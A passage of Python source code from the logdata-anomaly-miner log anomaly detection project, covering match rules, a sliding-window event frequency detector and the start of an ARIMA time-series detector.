self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if test_value is None: return False test_value = test_value.match_object if self.lower_limit <= test_value <= self.upper_limit: if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f'value({self.target_path}) inrange ({self.lower_limit}, {self.upper_limit})' class StringRegexMatchRule(MatchRule): """Elements of this class return true when the given path exists and the string repr of the value matches the regular expression.""" def __init__(self, target_path, match_regex, match_action=None): self.target_path = target_path self.match_regex = match_regex self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 # Use the class object as marker for nonexisting entries test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if (test_value is None) or (self.match_regex.match(test_value.match_string) is None): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): return f'string({self.target_path}) =regex= {self.match_regex.pattern}' class ModuloTimeMatchRule(MatchRule): """ Match elements of this class return true when the following conditions are met. The given target_path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are included in [lower, upper] range. """ def __init__(self, target_path, seconds_modulo, lower_limit, upper_limit, match_action=None, tzinfo=None): """ @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None, the default timestamp associated with the match is used. """ self.target_path = target_path self.seconds_modulo = seconds_modulo self.lower_limit = lower_limit self.upper_limit = upper_limit self.match_action = match_action self.tzinfo = tzinfo if tzinfo is None: self.tzinfo = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 test_value = None if self.target_path is None: test_value = log_atom.get_timestamp() else: time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if time_match is None: return False test_value = time_match.match_object + datetime.datetime.now(self.tzinfo).utcoffset().total_seconds() if test_value is None: return False test_value %= self.seconds_modulo if self.lower_limit <= test_value <= self.upper_limit: if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False class ValueDependentModuloTimeMatchRule(MatchRule): """ Match elements of this class return true when the following conditions are met. The given path exists, denotes a datetime object and the seconds since 1970 rom that date modulo the given value are included in a [lower, upper] range selected by values from the match. """ def __init__( self, target_path, seconds_modulo, target_path_list, limit_lookup_dict, default_limit=None, match_action=None, tzinfo=None): """ @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None, the default timestamp associated with the match is used. @param default_limit use this default limit when limit lookup failed. Without a default limit, a failed lookup will cause the rule not to match. """ self.target_path = target_path self.seconds_modulo = seconds_modulo self.target_path_list = target_path_list self.limit_lookup_dict = limit_lookup_dict self.default_limit = default_limit self.match_action = match_action self.tzinfo = tzinfo if tzinfo is None: self.tzinfo = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() value_list = [] for path in self.target_path_list: value_element = match_dict.get(path) if value_element is not None: value_list.append(value_element.match_object) if len(value_list) > 0: value = value_list[0] else: value = None limits = self.limit_lookup_dict.get(value, self.default_limit) if limits is None: return False test_value = None if self.target_path is None: test_value = log_atom.get_timestamp() else: time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if time_match is None: return False test_value = time_match.match_object + datetime.datetime.now(self.tzinfo).utcoffset().total_seconds() if test_value is None: return False test_value %= self.seconds_modulo if limits[0] <= test_value <= limits[1]: if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False class IPv4InRFC1918MatchRule(MatchRule): """ Match elements of this class return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges. This could also be done by distinct range match elements, but as this kind of matching is common, have an own element for it. """ def __init__(self, target_path, match_action=None): self.target_path = target_path self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 match_element = log_atom.parser_match.get_match_dictionary().get(self.target_path) if (match_element is None) or not isinstance(match_element.match_object, int): return False value = match_element.match_object if ((value & 0xff000000) == 0xa000000) or ((value & 0xfff00000) == 0xac100000) or ((value & 0xffff0000) == 0xc0a80000): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f'hasPath({self.target_path})' class DebugMatchRule(MatchRule): """ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match result is returned. """ def __init__(self, debug_match_result=False, match_action=None): self.debug_match_result = debug_match_result self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 print(f'Rules.DebugMatchRule: triggered while handling "{repr(log_atom.parser_match.match_element.match_string)}"', file=sys.stderr) if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return self.debug_match_result def __str__(self): return f'{self.debug_match_result}' class DebugHistoryMatchRule(MatchRule): """ This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just adds the evaluated log_atom to a ObjectHistory. """ def __init__(self, object_history=None, debug_match_result=False, match_action=None): """ Create a DebugHistoryMatchRule object. @param object_history use this ObjectHistory to collect the LogAtoms. When None, a default LogarithmicBackoffHistory for 10 items. """ if object_history is None: object_history = LogarithmicBackoffHistory(10) elif not isinstance(object_history, ObjectHistory): msg = 'object_history is not an instance of ObjectHistory' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.object_history = object_history self.debug_match_result = debug_match_result self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 self.object_history.add_object(log_atom) if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return self.debug_match_result def get_history(self): """Get the history object from this debug rule.""" return self.object_history SlidingEventFrequencyDetector.py000066400000000000000000000371341437606560100373040ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for event and value frequency exceedances with a sliding window approach. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from collections import deque from aminer.AminerConfig import STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class SlidingEventFrequencyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when event or value frequencies exceed the set limit.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, scoring_path_list=None, window_size=600, set_upper_limit=None, local_maximum_threshold=0.2, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None): """ Initialize the detector. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. @param window_size the length of the time window for counting in seconds. @param set_upper_limit sets the upper limit of the frequency test to the specified value. @param local_maximum_threshold sets the threshold for the detection of local maxima in the frequency analysis. A local maximum occurrs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit. @param persistence_id name of persistence document. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. """ # Avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, window_size=window_size, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, scoring_path_list=scoring_path_list, set_upper_limit=set_upper_limit, local_maximum_threshold=local_maximum_threshold, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list ) self.counts = {} self.scoring_value_list = {} self.max_frequency = {} self.max_frequency_time = {} self.max_frequency_log_atom = {} self.ranges = {} self.exceeded_frequency_range = {} self.exceeded_frequency_range_time = {} def receive_atom(self, log_atom): """Receive a log atom from a source.""" parser_match = log_atom.parser_match self.log_total += 1 # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return # Get the log event and save it in log_event if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return log_event = tuple(values) # Initialize the needed variables at first event occurrance if log_event not in self.counts: # Initialize counts, max_frequency, max_frequency_time exceeded_frequency_range and self.exceeded_frequency_range_time self.counts[log_event] = deque() self.max_frequency[log_event] = 0 self.max_frequency_time[log_event] = 0 self.max_frequency_log_atom[log_event] = None self.exceeded_frequency_range[log_event] = False self.exceeded_frequency_range_time[log_event] = 0 # Initialize the list for the scoring output if scoring_path_list is set if len(self.scoring_path_list) > 0: self.scoring_value_list[log_event] = deque() # Append current time to the counts list self.counts[log_event].append(log_atom.atom_time) # Get the id list if the scoring_path_list is set and save it for the anomaly message if len(self.scoring_path_list) > 0: for scoring_path in self.scoring_path_list: scoring_match = log_atom.parser_match.get_match_dictionary().get(scoring_path) if scoring_match is not None: # Get the value of the current path if isinstance(scoring_match.match_object, bytes): scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING) else: scoring_value = scoring_match.match_object # Save the value in the list if log_event in self.counts: self.scoring_value_list[log_event].append(scoring_value) else: self.scoring_value_list[log_event] = [scoring_value] # Get current frequency current_frequency = self.get_current_frequency(log_atom, log_event) # Save the current frequency and time if it exceeded the max_frequency if current_frequency > self.set_upper_limit and current_frequency > self.max_frequency[log_event]: self.max_frequency[log_event] = current_frequency self.max_frequency_time[log_event] = log_atom.atom_time self.max_frequency_log_atom[log_event] = log_atom # Reset counter self.reset_counter(log_atom, log_event) # Check if the frequency exceeded the upper limit for the first time if not self.exceeded_frequency_range[log_event] and current_frequency > self.set_upper_limit: # Print anomaly message if the last exceeding anomaly lies more than one time window in the past. if self.exceeded_frequency_range_time[log_event] + self.window_size < log_atom.atom_time: self.print(log_event, current_frequency, first_exceeded_threshold=True) self.exceeded_frequency_range_time[log_event] = log_atom.atom_time # Reset exceeded_frequency_range self.exceeded_frequency_range[log_event] = True # Check if the previous max_frequency is a local maximum # A local maximum is assumed if it lies one time window in the past, the frequency returned into the interval, or # if the maximum of the anomaly is higher than local_maximum_threshold times the upper limit elif self.exceeded_frequency_range[log_event] and ( self.max_frequency_time[log_event] + self.window_size < log_atom.atom_time or current_frequency <= self.set_upper_limit or current_frequency < self.max_frequency[log_event] - self.local_maximum_threshold * self.set_upper_limit): # Print anomaly message self.print(log_event, self.max_frequency[log_event], first_exceeded_threshold=False) # Reset max frequency and counter self.max_frequency[log_event] = 0 self.max_frequency_time[log_event] = 0 self.max_frequency_log_atom[log_event] = None self.reset_counter(log_atom, log_event) # Reset variable exceeded_frequency_range if the current frequency is lower or equal to the upper limit if current_frequency <= self.set_upper_limit: self.exceeded_frequency_range[log_event] = False def print(self, log_event, frequency, first_exceeded_threshold=False): """Sends an event to the listeners. The event can be the first exceeding of the limits or a local maximum""" try: data = self.max_frequency_log_atom[log_event].raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.max_frequency_log_atom[log_event].raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [self.max_frequency_log_atom[log_event].parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': list(log_event)} frequency_info = {'ExpectedLogAtomValuesFrequencyRange': [0, self.set_upper_limit], 'LogAtomValuesFrequency': frequency, 'WindowSize': self.window_size } if not first_exceeded_threshold: # Calculate the confidence value frequency_info['Confidence'] = 1 - self.set_upper_limit / frequency # Local maximum timestamp frequency_info['Local_maximum_timestamp'] = self.max_frequency_time[log_event] # In case that scoring_path_list is set, give their values to the event handlers for further analysis. if len(self.scoring_path_list) > 0: frequency_info['IdValues'] = list(self.scoring_value_list[log_event])[:self.max_frequency[log_event]] event_data = {'AnalysisComponent': analysis_component, 'FrequencyData': frequency_info} if first_exceeded_threshold: message = 'Frequency exceeds range for the first time' else: message = 'Frequency anomaly detected' for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.max_frequency_log_atom[log_event], self) # skipcq: PYL-R0201, PYL-W0613 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" return False # skipcq: PYL-R0201 def do_persist(self): """Immediately write persistence data to storage.""" return False def allowlist_event(self, event_type, event_data, allowlisting_data): # skipcq: PYL-W0613 """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': raise Exception('Event not from this source') raise Exception('No allowlisting for algorithm malfunction or configuration errors') def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 def reset_counter(self, log_atom, log_event): """Remove any timesfrom counts and scoring_value_list that fell out of the time window""" while len(self.counts[log_event]) > 0 and self.counts[log_event][0] < log_atom.atom_time - self.window_size: self.counts[log_event].popleft() if len(self.scoring_path_list) > 0: self.scoring_value_list[log_event].popleft() def get_current_frequency(self, log_atom, log_event): """Return current frequency of the current log event.""" return len([None for timestamp in self.counts[log_event] if timestamp >= log_atom.atom_time - self.window_size]) def get_weight_analysis_field_path(self): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" if self.scoring_path_list: return ['FrequencyData', 'IdValues'] return [] def get_weight_output_field_path(self): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" if self.scoring_path_list: return ['FrequencyData', 'Scoring'] return [] TSAArimaDetector.py000066400000000000000000001131661437606560100344300ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module is a detector which uses a tsa-arima model to track appearance frequencies of events. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging import copy from aminer import AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX,\ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil import numpy as np from statsmodels.tsa.arima.model import ARIMA from statsmodels.tsa.stattools import acf from scipy.signal import savgol_filter class TSAArimaDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class is used for an arima time series analysis of the appearances of log lines to events.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, waiting_time=1000, num_sections_waiting_time=100, acf_pause_interval_percentage=0.2, acf_auto_pause_interval=True, acf_auto_pause_interval_num_min=10, build_sum_over_values=False, num_periods_tsa_ini=15, num_division_time_step=10, alpha=0.05, num_min_time_history=20, num_max_time_history=30, num_results_bt=15, alpha_bt=0.05, acf_threshold=0.2, round_time_interval_threshold=0.02, force_period_length=False, set_period_length=604800, min_log_lines_per_time_step=10, persistence_id='Default', target_path_list=None, ignore_list=None, output_logline=True, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of events in the time windows. @param acf_pause_interval_percentage states which area of the results of the ACF are not used to find the highest peak. @param acf_auto_pause_interval states if the pause area is automatically set. If enabled, the variable acf_pause_interval_percentage loses its functionality. @param acf_auto_pause_interval_num_min states the number of values in which a local minima must be the minimum, to be considered a local minimum of the function and not an outlier. @param build_sum_over_values states if the sum of a series of counts is build before applying the TSA. @param num_periods_tsa_ini number of periods used to initialize the Arima-model. @param num_division_time_step number of division of the time window to calculate the time step. @param alpha significance level of the estimated values. @param num_min_time_history number of lines processed before the period length is calculated. @param num_max_time_history maximum number of values of the time_history. @param num_results_bt number of results which are used in the binomial test. @param alpha_bt significance level for the bt test. @param round_time_interval_threshold threshold for the rounding of the time_steps to the times in self.assumed_time_steps. The higher the threshold the easier the time is rounded to the next time in the list. @param acf_threshold threshold, which has to be exceeded by the highest peak of the cdf function of the time series, to be analyzed. @param force_period_length states if the period length is calculated through the ACF, or if the period length is forced to be set to set_period_length. @param set_period_length states how long the period length is if force_period_length is set to True. @param min_log_lines_per_time_step states the minimal average number of log lines per time step to make a TSA. @param persistence_id name of persistence file. @param target_path_list At least one of the parser paths in this list needs to appear in the event to be analyzed. @param waiting_time in seconds, until the time windows are being initialized. @param num_sections_waiting_time Number of sections of the initialization window. The length of the input-list of the calculate_time_steps is this number. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, acf_pause_interval_percentage=acf_pause_interval_percentage, acf_auto_pause_interval=acf_auto_pause_interval, acf_auto_pause_interval_num_min=acf_auto_pause_interval_num_min, build_sum_over_values=build_sum_over_values, num_periods_tsa_ini=num_periods_tsa_ini, num_division_time_step=num_division_time_step, alpha=alpha, num_min_time_history=num_min_time_history, num_max_time_history=num_max_time_history, num_results_bt=num_results_bt, alpha_bt=alpha_bt, acf_threshold=acf_threshold, round_time_interval_threshold=round_time_interval_threshold, force_period_length=force_period_length, set_period_length=set_period_length, min_log_lines_per_time_step=min_log_lines_per_time_step, waiting_time=waiting_time, num_sections_waiting_time=num_sections_waiting_time, persistence_id=persistence_id, target_path_list=target_path_list, ignore_list=ignore_list, output_logline=output_logline, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Add the TSAArimaDetector-module to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # List ot the time trigger. The first list states the times when something should be triggered, the second list states the indices # of the event types, or a list of the event type, a path and a value which should be counted (-1 for an initialization) # the third list states, the length of the time step (-1 for a one time trigger) self.time_trigger_list = [[], [], []] self.num_event_lines_ref = [] # Reference containing the number of lines of the events for the TSA self.time_window_history = [] # History of the time windows self.arima_models = [] # List of the single arima_models (statsmodels) self.prediction_history = [] # List of the observed values and the predictions of the TSAArima self.time_history = [] # List of the times of the observations self.result_list = [] # List of results if the value was in the limits of the one-step predictions # Minimal number of successes for the binomial test self.bt_min_suc = self.bt_min_successes(self.num_results_bt, self.alpha, self.alpha_bt) # Assumed occurring time steps in seconds. 1 minute: 60, 1 hour: 3600, 12 hours: 43200, 1 day: 86400, 1 week: 604800. self.assumed_time_steps = [60, 3600, 43200, 86400, 604800] # Load the persistence self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) # Import the persistence if persistence_data is not None: self.time_window_history = persistence_data[0] self.prediction_history = persistence_data[1] self.time_history = persistence_data[2] self.result_list = persistence_data[3] self.time_trigger_list = persistence_data[4] self.num_event_lines_ref = persistence_data[5] self.arima_models = [None for _ in self.time_window_history] # skipcq: PTC-W0060 for event_index in range(len(self.arima_models)): if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini*self.num_division_time_step: try: if not self.build_sum_over_values: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini*self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() else: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step+i: -(self.num_periods_tsa_ini-1)*self.num_division_time_step+i]) for i in range((self.num_periods_tsa_ini-1)*self.num_division_time_step)]+[ sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index] = None self.time_window_history[event_index] = [] else: self.arima_models[event_index] = None self.time_window_history[event_index] = [] # List of the pauses of the tests to the event numbers. If an arima model was initialized with the persistence, the model must # be trained before it can be used for forecasts. An integer states how many tests should be skipped before the next # output to this event number. None if no model was initialized for this event number. self.test_pause = [self.num_division_time_step if arima_models_statsmodel is not None else None for arima_models_statsmodel in self.arima_models] # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.time_trigger_list[0].append(-1) self.time_trigger_list[1].append(-1) self.time_trigger_list[2].append(-1) self.test_pause = None def receive_atom(self, log_atom): # skipcq: PYL-W0613, PYL-R0201 """ Receive the atom and return True. The log_atom doesn't need to be analyzed, because the counting and calls of the predictions is performed by the ETD. """ # Get current time if log_atom.atom_time is not None: current_time = log_atom.atom_time else: current_time = time.time() # Check if TSA should be initialized if -1 in self.time_trigger_list[0]: for i, val in enumerate(self.time_trigger_list[0]): if val == -1: # Initialize triggers for the time windows of the trainings phase for j in range(1, self.num_sections_waiting_time): self.time_trigger_list[0].append(current_time + self.waiting_time * j / ( self.num_sections_waiting_time)) self.time_trigger_list[1].append(-1) self.time_trigger_list[2].append(-1) self.time_trigger_list[0][i] = current_time + self.waiting_time # Save the current event lines count self.num_event_lines_ref = [[num] for num in self.event_type_detector.num_event_lines] break # Check if a trigger was triggered if len(self.time_trigger_list[0]) > 0 and any(current_time >= x for x in self.time_trigger_list[0]): # Get the indices of the triggered events indices = [i for i, time_trigger in enumerate(self.time_trigger_list[0]) if current_time >= time_trigger] # Execute the triggered functions of the TSA for i in range(len(indices)-1, -1, -1): # Checks if trigger is part of the initialisation if self.time_trigger_list[1][indices[i]] == -1 and self.time_trigger_list[2][indices[i]] == -1: # Save the number of occurred event types for the initialization of the TSA if self.num_event_lines_ref == [] or len( self.num_event_lines_ref[0]) < self.num_sections_waiting_time: # Expand the lists of self.num_event_lines_ref for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)): # skipcq: PTC-W0060 self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0])) # Add the current number of event lines for j, val in enumerate(self.event_type_detector.num_event_lines): self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j])) # Delete the initialization trigger del self.time_trigger_list[0][indices[i]] del self.time_trigger_list[1][indices[i]] del self.time_trigger_list[2][indices[i]] # Initialize the trigger for the time steps else: # Expand the lists of self.num_event_lines_ref for j in range(len(self.num_event_lines_ref), len(self.event_type_detector.num_event_lines)): # skipcq: PTC-W0060 self.num_event_lines_ref.append([0]*len(self.num_event_lines_ref[0])) # Add the current number of eventlines for j, val in enumerate(self.event_type_detector.num_event_lines): self.num_event_lines_ref[j].append(val-sum(self.num_event_lines_ref[j])) # skipcq: PTC-W0063 # Get the time step lengths. The first entry of the num_event_lines_ref states the number of log lines before the # initialization and is therefore excluded time_list = self.calculate_time_steps([val[1:] for val in self.num_event_lines_ref], log_atom) self.num_event_lines_ref = copy.copy(self.event_type_detector.num_event_lines) num_added_trigger = 0 # Add the new triggers for j, val in enumerate(time_list): if val != -1: num_added_trigger += 1 self.time_trigger_list[0].append(self.time_trigger_list[0][indices[i]] + val) self.time_trigger_list[1].append(j) self.time_trigger_list[2].append(val) # Delete the initialization trigger del self.time_trigger_list[0][indices[i]] del self.time_trigger_list[1][indices[i]] del self.time_trigger_list[2][indices[i]] # Run the update function for all trigger, which would already have been triggered for k in range(1, num_added_trigger+1): while current_time >= self.time_trigger_list[0][-k]: # skipcq: PTC-W0063 self.test_num_appearance(self.time_trigger_list[1][-k], self.event_type_detector.num_event_lines[ self.time_trigger_list[1][-k]] - self.num_event_lines_ref[ self.time_trigger_list[1][-k]], current_time, log_atom) self.time_trigger_list[0][-k] += self.time_trigger_list[2][-k] self.num_event_lines_ref[self.time_trigger_list[1][-k]] = self.event_type_detector.num_event_lines[ self.time_trigger_list[1][-k]] # Trigger for a reoccurring time step else: while current_time >= self.time_trigger_list[0][indices[i]]: # skipcq: PTC-W0063 self.test_num_appearance(self.time_trigger_list[1][indices[i]], self.event_type_detector.num_event_lines[ self.time_trigger_list[1][indices[i]]]-self.num_event_lines_ref[ self.time_trigger_list[1][indices[i]]], current_time, log_atom) self.time_trigger_list[0][indices[i]] += self.time_trigger_list[2][indices[i]] self.num_event_lines_ref[self.time_trigger_list[1][indices[i]]] = self.event_type_detector.num_event_lines[ self.time_trigger_list[1][indices[i]]] return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.time_window_history, self.prediction_history, self.time_history, self.result_list, self.time_trigger_list, self.num_event_lines_ref] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__) def allowlist_event(self, event_type, sorted_log_lines, event_data, allowlisting_data): # skipcq: PYL-W0613 """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': raise Exception('Event not from this source') raise Exception('No allowlisting for algorithm malfunction or configuration errors') def calculate_time_steps(self, counts, log_atom): """Returns a list of the timestep lengths in seconds, if no timestep should be created the value is set to -1""" time_step_list = [] # List of the resulting time_steps self.time_window_history = [[] for _ in range(len(counts))] # Initialize time_window_history self.arima_models = [None for _ in range(len(counts))] # Initialize arima_models self.prediction_history = [[[], [], []] for _ in range(len(counts))] # Initialize prediction_history self.time_history = [[] for _ in range(len(counts))] # Initialize time_history self.result_list = [[1]*self.num_results_bt for _ in range(len(counts))] # Initialize the lists of the results if self.force_period_length: # Force the period length time_step_list = [self.set_period_length / self.num_division_time_step for _ in counts] else: # Minimal size of the time step min_lag = max(int(self.acf_pause_interval_percentage*self.num_sections_waiting_time), 1) for event_index, data in enumerate(counts): if (self.target_path_list != [] and all(path not in self.event_type_detector.found_keys[ event_index] for path in self.target_path_list)) or (self.ignore_list != [] and any( ignore_path in self.event_type_detector.found_keys[event_index] for ignore_path in self.ignore_list)): time_step_list.append(-1) else: # Apply the autocorrection function to the data of the single event types. corr = list(map(abs, acf(data, nlags=len(data), fft=True))) corr = np.array(corr) # Apply the Savitzky-Golay-Filter to the list corr, to smooth the curve and get better results corrfit = savgol_filter(corr, min(max(3, int(len(corr)/100)-int(int(len(corr)/100) % 2 == 0)), 101), 1) # Set the pause area automatically if self.acf_auto_pause_interval: # Find the first local minima, 